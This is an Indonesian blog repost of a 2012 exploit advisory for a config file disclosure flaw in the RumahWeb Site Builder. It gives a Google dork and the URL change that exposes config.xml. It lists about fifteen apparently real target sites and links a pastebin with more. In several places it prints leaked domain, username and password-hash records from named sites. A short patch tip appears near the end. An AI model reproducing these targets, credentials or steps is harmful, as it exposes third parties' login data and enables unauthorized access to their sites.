join

sort

πŸ”Š π™Žπ™šπ™œπ™šπ™§π™– π˜Όπ™’π™—π™žπ™‘ πŸŽπŸŽ‰πŸ‘‡ Κœα΄€α΄…Ιͺα΄€Κœ α΄˜α΄‡Ι΄Ι’Ι’α΄œΙ΄α΄€ Κ™α΄€Κ€α΄œ π‘Ίπ’π’‚π’„π’Œ π‘½π’Šπ’…π’†π’ ➡️ π—žπ—Ÿπ—œπ—ž π——π—œπ—¦π—œπ—‘π—œ π—¦π—˜π—žπ—”π—₯π—”π—‘π—š ⬅️

intext:sitebuilder rumahweb | Girilaya Real Groups

Written By Raja unlock on Selasa, 11 Desember 2012 | 03.35

Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb

Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml


Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e

Sumber : http://go.girilaya.com/0l0qwm
Twisted Evil

Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/

<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>

bagi teman2 yang sudah terlanjur memakai SITEBUILDer tersebut . .. jangan kwatir dan jangan underestimate dulu. . . ita juga bisa PATCHing koq... dengan menghapus Template dan menghapus template.xml yang ada di /data/config/template.xml.

contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
Spoiler:



<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>

<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>

flasher-center.com BLOG FLASHER-CENTER.COM Updated at: 03.35

0 komentar:

Posting Komentar

 
berita unik
We Accept No Responsibility for The Content of Forum and Advertising Material Available to Flasher-Center.Com Contact us if you feel disadvantaged by the contents of the information in Flasher-Center.com
Find us on Google+